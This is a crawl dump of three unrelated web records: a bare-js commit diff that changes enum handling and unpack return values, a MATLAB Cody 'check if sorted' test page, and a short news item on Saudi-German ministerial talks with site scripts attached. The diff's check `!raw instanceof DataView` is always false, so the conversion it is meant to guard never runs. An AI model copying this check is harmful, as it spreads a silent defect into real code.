addrTest = 
Uint8Array.from([\nconsole.log(test1);\nlet test1_bin = Test1.pack(test1);\nconsole.log(test1_bin);\n-\tlet test1_un = Test1.unpack(test1_bin);\n+\tlet [test1_un, t1l] = Test1.unpack(test1_bin);\nconsole.log(test1_un);\n\nconsole.log(\"-------------------\");\nconsole.log(test2);\nlet test2_bin = Test2.pack(test2);\nconsole.log(test2_bin);\n-\tlet test2_un = Test2.unpack(test2_bin);\n+\tlet [test2_un, t2l] = Test2.unpack(test2_bin);\nconsole.log(test2_un);\n\nconsole.log(\"-------------------\");\n-\tlet addr = Address.unpack(addrTest);\n+\tconsole.log(test3);\n+\tlet test3_bin = Test3.pack(test3);\n+\tconsole.log(test3_bin);\n+\tlet [test3_un, t3l] = Test3.unpack(test3_bin);\n+\tconsole.log(test3_un);\n+\n+\tconsole.log(\"-------------------\");\n+\tlet [addr, al] = Address.unpack(addrTest);\nconsole.log(addr);\n})();=\n\\ No newline at end of file\n\n```\n`M lib-bare.js => lib-bare.js +55 -7`\n```@@ 19,6 19,16 @@ function twoWayMap(pairs) {\nreturn map;\n}\n\n+function reverseMapping(obj) {\n+\tlet entries = Object.entries(obj);\n+\tlet reverse = {};\n+\tfor (let i = 0; i < entries.length; i++) {\n+\t\tlet [key, val] = entries[i];\n+\t\treverse[val] = key;\n+\t}\n+\treturn reverse;\n+}\n+\nfunction safeNumber(bigInt) {\nif (bigInt > MAX_U53 || bigInt < -MAX_U53) {\nthrow RangeError(\"BigInt value out of double precision range (53 bits)\");\n\n@@ 266,19 276,39 @@ class BareBool extends BarePrimitive {\n}\n}\n\n-// TODO how (and where) to represent/store possible values for an enum (since js doesn't have an enum type)\n+function mapEnum(enumClass, keys) {\n+\tlet entries = Object.entries(keys);\n+\tfor (let i = 0; i < entries.length; i++) {\n+\t\tlet [key, name] = entries[i];\n+\t\tenumClass[name] = key;\n+\t}\n+\treturn keys;\n+}\nclass BareEnum extends BarePrimitive {\n-\tstatic values; // = twoWayMap([['name', n], ...])\n+\t// alternatively an array with gaps is allowed: ['ONE', 'TWO', , , 'FIVE']\n+\t// this can also be done by index after the class definition:\n+\t// Enum.keys = 'SPECIAL';\n+\t// although you then have to run mapEnum after that\n+\tstatic keys; // = mapEnum(this, {0:'NAME1', 1:'NAME2', 4:'NAME5', ...})\n\n-\tstatic pack(obj) {\n-\t\tlet num = this.values[obj];\n+\tstatic pack(value) {\n+\t\tif (!this.keys[value]) {\n+\t\t\tthrow ReferenceError(\"Invalid enum value\");\n+\t\t}\n+\t\tlet num = BigInt(value);\nreturn BareUInt.pack(num);\n}\n\nstatic unpack(raw) {\nlet [value, bytes] = BareUInt.unpack(raw);\n-\t\tlet name = this.values[value];\n-\t\treturn [name, bytes];\n+\t\tif (value > MAX_U32) {\n+\t\t\tthrow RangeError(\"Enum value out of range\");\n+\t\t}\n+\t\tif (!this.keys[value]) {\n+\t\t\tthrow ReferenceError(\"Invalid enum value\");\n+\t\t}\n+\t\tvalue = Number(value);\n+\t\treturn [value, bytes];\n}\n}\n\n@@ 362,6 392,10 @@ class BareOptional extends BareType {\n}\n\nstatic unpack(raw) {\n+\t\t// make sure raw is a DataView, relevant if this is the top level element\n+\t\tif (!raw instanceof DataView) {\n+\t\t\traw = new DataView(raw.buffer, raw.byteOffset);\n+\t\t}\nlet status = raw.getUint8(0);\nif (status === 0) {\nreturn [undefined, 1];\n\n@@ 411,6 445,10 @@ class BareArray extends BareType {\n}\n\nstatic unpack(raw) {\n+\t\t// make sure raw is a DataView, relevant if this is the top level element\n+\t\tif (!raw instanceof DataView) {\n+\t\t\traw = new DataView(raw.buffer, raw.byteOffset);\n+\t\t}\nlet obj = [];\nlet [numElements, length] = BareUInt.unpack(raw);\nif (numElements > MAX_ARRAY_LENGTH) {\n\n@@ 445,6 483,10 @@ class BareMap extends BareType 
{\n}\n\nstatic unpack(raw) {\n+\t\t// make sure raw is a DataView, relevant if this is the top level element\n+\t\tif (!raw instanceof DataView) {\n+\t\t\traw = new DataView(raw.buffer, raw.byteOffset);\n+\t\t}\nlet obj = {};\nlet [numEntries, length] = BareUInt.unpack(raw);\nif (numEntries > MAX_MAP_LENGTH) {\n\n@@ 483,6 525,10 @@ class BareUnion extends BareType {\n}\n\nstatic unpack(raw) {\n+\t\t// make sure raw is a DataView, relevant if this is the top level element\n+\t\tif (!raw instanceof DataView) {\n+\t\t\traw = new DataView(raw.buffer, raw.byteOffset);\n+\t\t}\nlet [index, length] = BareUInt.unpack(raw);\nlet objType = this.types[index];\nlet [obj, bytes] = objType.unpack(new DataView(raw.buffer, raw.byteOffset + length));\n\n@@ 514,12 560,14 @@ class BareStruct extends BareType {\nlength += bytes;\nobj[key] = value;\n}\n-\t\treturn obj;\n+\t\treturn [obj, length];\n}\n}\n\nmodule.exports = {\ntwoWayMap: twoWayMap,\n+\treverseMapping: reverseMapping,\n+\tmapEnum: mapEnum,\nsafeNumber: safeNumber,\nUInt: BareUInt,\nInt: BareInt,\n\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5841392,"math_prob":0.9695364,"size":7425,"snap":"2021-21-2021-25","text_gpt3_token_len":1989,"char_repetition_ratio":0.11359655,"word_repetition_ratio":0.28356963,"special_character_ratio":0.33171716,"punctuation_ratio":0.21788502,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97250414,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-15T08:54:44Z\",\"WARC-Record-ID\":\"<urn:uuid:1cba40ba-88c2-4200-ade6-58a09b714b5a>\",\"Content-Length\":\"50566\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:be396305-ec25-4ddc-be7b-82f7cc9a5fff>\",\"WARC-Concurrent-To\":\"<urn:uuid:7b518ca8-357d-44bc-b4ce-daa97069a787>\",\"WARC-IP-Address\":\"173.195.146.142\",\"WARC-Target-URI\":\"https://git.sr.ht/~kiito/bare-js/commit/1746c5aa62555c0f8b3b9644f60b021a08d303e3\",\"WARC-Payload-Digest\":\"sha1:YJLROF2ZKRRHAZXCK32DJ6OE7N6JAYP3\",\"WARC-Block-Digest\":\"sha1:SSQLGFJ7JPRXV7RZ6U2ZEQQ25YJKQXFV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487620971.25_warc_CC-MAIN-20210615084235-20210615114235-00082.warc.gz\"}"}
https://www.mathworks.com/matlabcentral/cody/problems/109-check-if-sorted/solutions/1262570
[ "Cody\n\n# Problem 109. Check if sorted\n\nSolution 1262570\n\nSubmitted on 5 Sep 2017 by Gabriel Delcros\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nx = sort(rand(1,10^5)); y_correct = 1; assert(isequal(sortok(x),y_correct))\n\ntaille = 100000\n\n2   Pass\nx = [1 5 4 3 8 7 3]; y_correct = 0; assert(isequal(sortok(x),y_correct))\n\ntaille = 7" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5848634,"math_prob":0.976364,"size":457,"snap":"2020-24-2020-29","text_gpt3_token_len":149,"char_repetition_ratio":0.13686535,"word_repetition_ratio":0.0,"special_character_ratio":0.36105034,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96612304,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-09T15:28:54Z\",\"WARC-Record-ID\":\"<urn:uuid:d9397e29-6269-4653-a71e-58cf0e0e3c24>\",\"Content-Length\":\"76020\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:da64bbf8-1c9c-4cdb-9630-5190864aee3f>\",\"WARC-Concurrent-To\":\"<urn:uuid:7ae3d0df-38a1-4795-a483-f2c4278ef3b3>\",\"WARC-IP-Address\":\"23.66.56.59\",\"WARC-Target-URI\":\"https://www.mathworks.com/matlabcentral/cody/problems/109-check-if-sorted/solutions/1262570\",\"WARC-Payload-Digest\":\"sha1:YH6TZUQB2WXGDMS6GDQXDWZKEQVLQXYG\",\"WARC-Block-Digest\":\"sha1:SRFTRFBC34PSELJ2K747FZVKIAMP2WLH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655900335.76_warc_CC-MAIN-20200709131554-20200709161554-00429.warc.gz\"}"}
https://newshuntexpress.com/saudi-german-foreign-ministers-hold-talks-in-jeddah/
[ "Allways With You\n\n# Saudi, German foreign ministers hold talks in Jeddah", null, "JEDDAH — Foreign Minister Prince Faisal Bin Farhan and German Foreign Minister Annalena Baerbock held official talks in Jeddah on Monday.\n\nThey emphasized the importance of concerted efforts at all levels to achieve common goals.\n\nThey also discussed ways to enhance bilateral efforts in establishing the foundations for regional and global peace.\n\nThe two sides reviewed bilateral relations and discussed ways to enhance and develop them for the benefit of both countries.\n\nThey also focused on strengthening bilateral coordination on various regional and international issues, particularly in the political, security, and economic domains.\n\nThe German foreign minister expressed gratitude and appreciation for the Kingdom’s successful evacuation of German nationals from Sudan.\n\nShe acknowledged the high efficiency of the Saudi authorities in carrying out these operations.\n\nPrince Abdullah Bin Khalid Bin Sultan, Saudi Ambassador to Germany, and Ambassador Dr. Saud Bin Mohammed Al Sati, undersecretary of the Foreign Ministry for Political Affairs, was present during the session. \\begingroup SG\n\n#### `You missed`\n\n``` International ```\n\n#### ` France fails to tackle growing gang problem`\n\n``` Oct 4, 2023 newshuntexpress```\n``` International ```\n\n#### ` Pakistan orders 1.7 million Afghans out of country`\n\n``` Oct 4, 2023 newshuntexpress```\n``` International ```\n\n#### ` TikTok halts online shopping service in Indonesia`\n\n``` Oct 4, 2023 newshuntexpress```\n``` International ```\n\n#### ` Boat carrying 280 migrants lands in Canary Islands`\n\n``` Oct 4, 2023 newshuntexpress```\n``` Manage Cookie Consent To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions. Functional Functional Always active The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network. Preferences Preferences The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user. Statistics Statistics The technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you. Marketing Marketing The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes. 
Manage options Manage services Manage vendors Read more about these purposes View preferences {title} {title} {title} window.gtranslateSettings=window.gtranslateSettings||{};window.gtranslateSettings['39445477']={\"default_language\":\"en\",\"languages\":[\"hi\",\"en\",\"ne\",\"bn\",\"ar\",\"ur\"],\"url_structure\":\"none\",\"flag_style\":\"3d\",\"flag_size\":16,\"wrapper_selector\":\"#gt-wrapper-39445477\",\"alt_flags\":[],\"switcher_open_direction\":\"top\",\"switcher_horizontal_position\":\"right\",\"switcher_vertical_position\":\"top\",\"switcher_text_color\":\"#666\",\"switcher_arrow_color\":\"#666\",\"switcher_border_color\":\"#ccc\",\"switcher_background_color\":\"#fff\",\"switcher_background_shadow_color\":\"#dd3333\",\"switcher_background_hover_color\":\"#fff\",\"dropdown_text_color\":\"#000\",\"dropdown_hover_color\":\"#fff\",\"dropdown_background_color\":\"#eee\",\"flags_location\":\"\\/wp-content\\/plugins\\/gtranslate\\/flags\\/\"} var mi_version = '8.19'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStrs = [ 'ga-disable-G-HJ788Z9FQZ', ]; /* Function to detect opted out users */ function __gtagTrackerIsOptedOut() { for (var index = 0; index < disableStrs.length; index++) { if (document.cookie.indexOf(disableStrs[index] + '=true') > -1) { return true; } } return false; } /* Disable tracking if the opt-out cookie exists. */ if (__gtagTrackerIsOptedOut()) { for (var index = 0; index < disableStrs.length; index++) { window[disableStrs[index]] = true; } } /* Opt-out function */ function __gtagTrackerOptout() { for (var index = 0; index < disableStrs.length; index++) { document.cookie = disableStrs[index] + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStrs[index]] = true; } } if ('undefined' === typeof gaOptout) { function gaOptout() { __gtagTrackerOptout(); } } window.dataLayer = window.dataLayer || []; window.MonsterInsightsDualTracker = { helpers: {}, trackers: {}, }; if (mi_track_user) { function __gtagDataLayer() { dataLayer.push(arguments); } function __gtagTracker(type, name, parameters) { if (!parameters) { parameters = {}; } if (parameters.send_to) { __gtagDataLayer.apply(null, arguments); return; } if (type === 'event') { parameters.send_to = monsterinsights_frontend.v4_id; var hookName = name; if (typeof parameters['event_category'] !== 'undefined') { hookName = parameters['event_category'] + ':' + name; } if (typeof MonsterInsightsDualTracker.trackers[hookName] !== 'undefined') { MonsterInsightsDualTracker.trackers[hookName](parameters); } else { __gtagDataLayer('event', name, parameters); } } else { __gtagDataLayer.apply(null, arguments); } } __gtagTracker('js', new Date()); __gtagTracker('set', { 'developer_id.dZGIzZG': true, }); __gtagTracker('config', 'G-HJ788Z9FQZ', {\"forceSSL\":\"true\",\"link_attribution\":\"true\"} ); window.gtag = __gtagTracker; (function () { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ /* ga and __gaTracker compatibility shim. 
*/ var noopfn = function () { return null; }; var newtracker = function () { return new Tracker(); }; var Tracker = function () { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = function () { var args = Array.prototype.slice.call(arguments); args.unshift('send'); __gaTracker.apply(null, args); }; var __gaTracker = function () { var len = arguments.length; if (len === 0) { return; } var f = arguments[len - 1]; if (typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function') { if ('send' === arguments) { var hitConverted, hitObject = false, action; if ('event' === arguments) { if ('undefined' !== typeof arguments) { hitObject = { 'eventAction': arguments, 'eventCategory': arguments, 'eventLabel': arguments, 'value': arguments ? arguments : 1, } } } if ('pageview' === arguments) { if ('undefined' !== typeof arguments) { hitObject = { 'eventAction': 'page_view', 'page_path': arguments, } } } if (typeof arguments === 'object') { hitObject = arguments; } if (typeof arguments === 'object') { Object.assign(hitObject, arguments); } if ('undefined' !== typeof arguments.hitType) { hitObject = arguments; if ('pageview' === hitObject.hitType) { hitObject.eventAction = 'page_view'; } } if (hitObject) { action = 'timing' === arguments.hitType ? 'timing_complete' : hitObject.eventAction; hitConverted = mapArgs(hitObject); __gtagTracker('event', action, hitConverted); } } return; } function mapArgs(args) { var arg, hit = {}; var gaMap = { 'eventCategory': 'event_category', 'eventAction': 'event_action', 'eventLabel': 'event_label', 'eventValue': 'event_value', 'nonInteraction': 'non_interaction', 'timingCategory': 'event_category', 'timingVar': 'name', 'timingValue': 'value', 'timingLabel': 'event_label', 'page': 'page_path', 'location': 'page_location', 'title': 'page_title', }; for (arg in args) { if (!(!args.hasOwnProperty(arg) || !gaMap.hasOwnProperty(arg))) { hit[gaMap[arg]] = args[arg]; } else { hit[arg] = args[arg]; } } return hit; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = newtracker; __gaTracker.getByName = newtracker; __gaTracker.getAll = function () { return []; }; __gaTracker.remove = noopfn; __gaTracker.loaded = true; window['__gaTracker'] = __gaTracker; })(); } else { console.log(\"\"); (function () { function __gtagTracker() { return null; } window['__gtagTracker'] = __gtagTracker; window['gtag'] = __gtagTracker; })(); } !function(t,e){\"object\"==typeof exports&&\"undefined\"!=typeof module?module.exports=e():\"function\"==typeof define&&define.amd?define(e):(t=\"undefined\"!=typeof globalThis?globalThis:t||self).LazyLoad=e()}(this,function(){\"use strict\";function e(){return(e=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n,a=arguments[e];for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(t[n]=a[n])}return t}).apply(this,arguments)}function i(t){return e({},it,t)}function o(t,e){var n,a=\"LazyLoad::Initialized\",i=new t(e);try{n=new CustomEvent(a,{detail:{instance:i}})}catch(t){(n=document.createEvent(\"CustomEvent\")).initCustomEvent(a,!1,!1,{instance:i})}window.dispatchEvent(n)}function l(t,e){return t.getAttribute(gt+e)}function c(t){return l(t,bt)}function s(t,e){return function(t,e,n){e=gt+e;null!==n?t.setAttribute(e,n):t.removeAttribute(e)}(t,bt,e)}function r(t){return s(t,null),0}function u(t){return null===c(t)}function d(t){return c(t)===vt}function f(t,e,n,a){t&&(void 0===a?void 0===n?t(e):t(e,n):t(e,n,a))}function _(t,e){nt?t.classList.add(e):t.className+=(t.className?\" 
\":\"\")+e}function v(t,e){nt?t.classList.remove(e):t.className=t.className.replace(new RegExp(\"(^|\\\\s+)\"+e+\"(\\\\s+|\\$)\"),\" \").replace(/^\\s+/,\"\").replace(/\\s+\\$/,\"\")}function g(t){return t.llTempImage}function b(t,e){!e||(e=e._observer)&&e.unobserve(t)}function p(t,e){t&&(t.loadingCount+=e)}function h(t,e){t&&(t.toLoadCount=e)}function n(t){for(var e,n=[],a=0;e=t.children[a];a+=1)\"SOURCE\"===e.tagName&&n.push(e);return n}function m(t,e){(t=t.parentNode)&&\"PICTURE\"===t.tagName&&n(t).forEach(e)}function a(t,e){n(t).forEach(e)}function E(t){return!!t[st]}function I(t){return t[st]}function y(t){return delete t[st]}function A(e,t){var n;E(e)||(n={},t.forEach(function(t){n[t]=e.getAttribute(t)}),e[st]=n)}function k(a,t){var i;E(a)&&(i=I(a),t.forEach(function(t){var e,n;e=a,(t=i[n=t])?e.setAttribute(n,t):e.removeAttribute(n)}))}function L(t,e,n){_(t,e.class_loading),s(t,ut),n&&(p(n,1),f(e.callback_loading,t,n))}function w(t,e,n){n&&t.setAttribute(e,n)}function x(t,e){w(t,ct,l(t,e.data_sizes)),w(t,rt,l(t,e.data_srcset)),w(t,ot,l(t,e.data_src))}function O(t,e,n){var a=l(t,e.data_bg_multi),i=l(t,e.data_bg_multi_hidpi);(a=at&&i?i:a)&&(t.style.backgroundImage=a,n=n,_(t=t,(e=e).class_applied),s(t,ft),n&&(e.unobserve_completed&&b(t,e),f(e.callback_applied,t,n)))}function N(t,e){!e||0<e.loadingCount||0<e.toLoadCount||f(t.callback_finish,e)}function C(t,e,n){t.addEventListener(e,n),t.llEvLisnrs[e]=n}function M(t){return!!t.llEvLisnrs}function z(t){if(M(t)){var e,n,a=t.llEvLisnrs;for(e in a){var i=a[e];n=e,i=i,t.removeEventListener(n,i)}delete t.llEvLisnrs}}function R(t,e,n){var a;delete t.llTempImage,p(n,-1),(a=n)&&--a.toLoadCount,v(t,e.class_loading),e.unobserve_completed&&b(t,n)}function T(o,r,c){var l=g(o)||o;M(l)||function(t,e,n){M(t)||(t.llEvLisnrs={});var a=\"VIDEO\"===t.tagName?\"loadeddata\":\"load\";C(t,a,e),C(t,\"error\",n)}(l,function(t){var e,n,a,i;n=r,a=c,i=d(e=o),R(e,n,a),_(e,n.class_loaded),s(e,dt),f(n.callback_loaded,e,a),i||N(n,a),z(l)},function(t){var e,n,a,i;n=r,a=c,i=d(e=o),R(e,n,a),_(e,n.class_error),s(e,_t),f(n.callback_error,e,a),i||N(n,a),z(l)})}function G(t,e,n){var a,i,o,r,c;t.llTempImage=document.createElement(\"IMG\"),T(t,e,n),E(c=t)||(c[st]={backgroundImage:c.style.backgroundImage}),o=n,r=l(a=t,(i=e).data_bg),c=l(a,i.data_bg_hidpi),(r=at&&c?c:r)&&(a.style.backgroundImage='url(\"'.concat(r,'\")'),g(a).setAttribute(ot,r),L(a,i,o)),O(t,e,n)}function D(t,e,n){var a;T(t,e,n),a=e,e=n,(t=It[(n=t).tagName])&&(t(n,a),L(n,a,e))}function V(t,e,n){var a;a=t,(-1<yt.indexOf(a.tagName)?D:G)(t,e,n)}function F(t,e,n){var a;t.setAttribute(\"loading\",\"lazy\"),T(t,e,n),a=e,(e=It[(n=t).tagName])&&e(n,a),s(t,vt)}function j(t){t.removeAttribute(ot),t.removeAttribute(rt),t.removeAttribute(ct)}function P(t){m(t,function(t){k(t,Et)}),k(t,Et)}function S(t){var e;(e=At[t.tagName])?e(t):E(e=t)&&(t=I(e),e.style.backgroundImage=t.backgroundImage)}function U(t,e){var n;S(t),n=e,u(e=t)||d(e)||(v(e,n.class_entered),v(e,n.class_exited),v(e,n.class_applied),v(e,n.class_loading),v(e,n.class_loaded),v(e,n.class_error)),r(t),y(t)}function \\$(t,e,n,a){var i;n.cancel_on_exit&&(c(t)!==ut||\"IMG\"===t.tagName&&(z(t),m(i=t,function(t){j(t)}),j(i),P(t),v(t,n.class_loading),p(a,-1),r(t),f(n.callback_cancel,t,e,a)))}function q(t,e,n,a){var i,o,r=(o=t,0<=pt.indexOf(c(o)));s(t,\"entered\"),_(t,n.class_entered),v(t,n.class_exited),i=t,o=a,n.unobserve_entered&&b(i,o),f(n.callback_enter,t,e,a),r||V(t,n,a)}function H(t){return t.use_native&&\"loading\"in HTMLImageElement.prototype}function 
B(t,i,o){t.forEach(function(t){return(a=t).isIntersecting||0<a.intersectionRatio?q(t.target,t,i,o):(e=t.target,n=t,a=i,t=o,void(u(e)||(_(e,a.class_exited),\\$(e,n,a,t),f(a.callback_exit,e,n,t))));var e,n,a})}function J(e,n){var t;et&&!H(e)&&(n._observer=new IntersectionObserver(function(t){B(t,e,n)},{root:(t=e).container===document?null:t.container,rootMargin:t.thresholds||t.threshold+\"px\"}))}function K(t){return Array.prototype.slice.call(t)}function Q(t){return t.container.querySelectorAll(t.elements_selector)}function W(t){return c(t)===_t}function X(t,e){return e=t||Q(e),K(e).filter(u)}function Y(e,t){var n;(n=Q(e),K(n).filter(W)).forEach(function(t){v(t,e.class_error),r(t)}),t.update()}function t(t,e){var n,a,t=i(t);this._settings=t,this.loadingCount=0,J(t,this),n=t,a=this,Z&&window.addEventListener(\"online\",function(){Y(n,a)}),this.update(e)}var Z=\"undefined\"!=typeof window,tt=Z&&!(\"onscroll\"in window)||\"undefined\"!=typeof navigator&&/(gle|ing|ro)bot|crawl|spider/i.test(navigator.userAgent),et=Z&&\"IntersectionObserver\"in window,nt=Z&&\"classList\"in document.createElement(\"p\"),at=Z&&1<window.devicePixelRatio,it={elements_selector:\".lazy\",container:tt||Z?document:null,threshold:300,thresholds:null,data_src:\"src\",data_srcset:\"srcset\",data_sizes:\"sizes\",data_bg:\"bg\",data_bg_hidpi:\"bg-hidpi\",data_bg_multi:\"bg-multi\",data_bg_multi_hidpi:\"bg-multi-hidpi\",data_poster:\"poster\",class_applied:\"applied\",class_loading:\"litespeed-loading\",class_loaded:\"litespeed-loaded\",class_error:\"error\",class_entered:\"entered\",class_exited:\"exited\",unobserve_completed:!0,unobserve_entered:!1,cancel_on_exit:!0,callback_enter:null,callback_exit:null,callback_applied:null,callback_loading:null,callback_loaded:null,callback_error:null,callback_finish:null,callback_cancel:null,use_native:!1},ot=\"src\",rt=\"srcset\",ct=\"sizes\",lt=\"poster\",st=\"llOriginalAttrs\",ut=\"loading\",dt=\"loaded\",ft=\"applied\",_t=\"error\",vt=\"native\",gt=\"data-\",bt=\"ll-status\",pt=[ut,dt,ft,_t],ht=[ot],mt=[ot,lt],Et=[ot,rt,ct],It={IMG:function(t,e){m(t,function(t){A(t,Et),x(t,e)}),A(t,Et),x(t,e)},IFRAME:function(t,e){A(t,ht),w(t,ot,l(t,e.data_src))},VIDEO:function(t,e){a(t,function(t){A(t,ht),w(t,ot,l(t,e.data_src))}),A(t,mt),w(t,lt,l(t,e.data_poster)),w(t,ot,l(t,e.data_src)),t.load()}},yt=[\"IMG\",\"IFRAME\",\"VIDEO\"],At={IMG:P,IFRAME:function(t){k(t,ht)},VIDEO:function(t){a(t,function(t){k(t,ht)}),k(t,mt),t.load()}},kt=[\"IMG\",\"IFRAME\",\"VIDEO\"];return t.prototype={update:function(t){var e,n,a,i=this._settings,o=X(t,i);{if(h(this,o.length),!tt&&et)return H(i)?(e=i,n=this,o.forEach(function(t){-1!==kt.indexOf(t.tagName)&&F(t,e,n)}),void h(n,0)):(t=this._observer,i=o,t.disconnect(),a=t,void i.forEach(function(t){a.observe(t)}));this.loadAll(o)}},destroy:function(){this._observer&&this._observer.disconnect(),Q(this._settings).forEach(function(t){y(t)}),delete this._observer,delete this._settings,delete this.loadingCount,delete this.toLoadCount},loadAll:function(t){var e=this,n=this._settings;X(t,n).forEach(function(t){b(t,e),V(t,n,e)})},restoreAll:function(){var e=this._settings;Q(e).forEach(function(t){U(t,e)})}},t.load=function(t,e){e=i(e);V(t,e)},t.resetStatus=function(t){r(t)},Z&&function(t,e){if(e)if(e.length)for(var n,a=0;n=e[a];a+=1)o(t,n);else o(t,e)}(t,window.lazyLoadOptions),t});!function(e,t){\"use strict\";function a(){t.body.classList.add(\"litespeed_lazyloaded\")}function n(){console.log(\"[LiteSpeed] Start Lazy Load Images\"),d=new 
LazyLoad({elements_selector:\"[data-lazyloaded]\",callback_finish:a}),o=function(){d.update()},e.MutationObserver&&new MutationObserver(o).observe(t.documentElement,{childList:!0,subtree:!0,attributes:!0})}var d,o;e.addEventListener?e.addEventListener(\"load\",n,!1):e.attachEvent(\"onload\",n)}(window,document);var litespeed_vary=document.cookie.replace(/(?:(?:^|.*;\\s*)_lscache_vary\\s*\\=\\s*([^;]*).*\\$)|^.*\\$/,\"\");litespeed_vary||fetch(\"/wp-content/plugins/litespeed-cache/guest.vary.php\",{method:\"POST\",cache:\"no-cache\",redirect:\"follow\"}).then(e=>e.json()).then(e=>{console.log(e),e.hasOwnProperty(\"reload\")&&\"yes\"==e.reload&&(sessionStorage.setItem(\"litespeed_docref\",document.referrer),window.location.reload(!0))});const litespeed_ui_events=[\"mouseover\",\"click\",\"keydown\",\"wheel\",\"touchmove\",\"touchstart\"];var urlCreator=window.URL||window.webkitURL;function litespeed_load_delayed_js_force(){console.log(\"[LiteSpeed] Start Load JS Delayed\"),litespeed_ui_events.forEach(e=>{window.removeEventListener(e,litespeed_load_delayed_js_force,{passive:!0})}),document.querySelectorAll(\"iframe[data-litespeed-src]\").forEach(e=>{e.setAttribute(\"src\",e.getAttribute(\"data-litespeed-src\"))}),\"loading\"==document.readyState?window.addEventListener(\"DOMContentLoaded\",litespeed_load_delayed_js):litespeed_load_delayed_js()}litespeed_ui_events.forEach(e=>{window.addEventListener(e,litespeed_load_delayed_js_force,{passive:!0})});async function litespeed_load_delayed_js(){let t=[];for(var d in document.querySelectorAll('script[type=\"litespeed/javascript\"]').forEach(e=>{t.push(e)}),t)await new Promise(e=>litespeed_load_one(t[d],e));document.dispatchEvent(new Event(\"DOMContentLiteSpeedLoaded\")),window.dispatchEvent(new Event(\"DOMContentLiteSpeedLoaded\"))}function litespeed_load_one(t,e){console.log(\"[LiteSpeed] Load \",t);var d=document.createElement(\"script\");d.addEventListener(\"load\",e),d.addEventListener(\"error\",e),t.getAttributeNames().forEach(e=>{\"type\"!=e&&d.setAttribute(\"data-src\"==e?\"src\":e,t.getAttribute(e))});let a=!(d.type=\"text/javascript\");!d.src&&t.textContent&&(d.src=litespeed_inline2src(t.textContent),a=!0),t.after(d),t.remove(),a&&e()}function litespeed_inline2src(t){try{var d=urlCreator.createObjectURL(new Blob([t.replace(/^(?:<!--)?(.*?)(?:-->)?\\$/gm,\"\\$1\")],{type:\"text/javascript\"}))}catch(e){d=\"data:text/javascript;base64,\"+btoa(t.replace(/^(?:<!--)?(.*?)(?:-->)?\\$/gm,\"\\$1\"))}return d} ```" ]
[ null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI2MDAiIGhlaWdodD0iMTM2NiIgdmlld0JveD0iMCAwIDYwMCAxMzY2Ij48cmVjdCB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBzdHlsZT0iZmlsbDojY2ZkNGRiO2ZpbGwtb3BhY2l0eTogMC4xOyIvPjwvc3ZnPg==", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94014364,"math_prob":0.9294934,"size":1093,"snap":"2023-40-2023-50","text_gpt3_token_len":193,"char_repetition_ratio":0.10560147,"word_repetition_ratio":0.0,"special_character_ratio":0.1610247,"punctuation_ratio":0.09195402,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9553512,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-04T10:57:57Z\",\"WARC-Record-ID\":\"<urn:uuid:5447b262-65aa-40cf-8c1f-9aba37ad5c9b>\",\"Content-Length\":\"77765\",\"Content-Type\":\"application/http; 